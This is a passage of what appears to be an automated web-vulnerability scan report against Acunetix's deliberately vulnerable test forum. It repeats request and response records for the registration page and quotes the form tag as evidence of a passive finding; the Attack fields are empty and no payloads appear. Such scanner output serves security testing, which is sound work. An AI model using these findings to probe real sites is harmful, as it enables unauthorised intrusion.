Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web 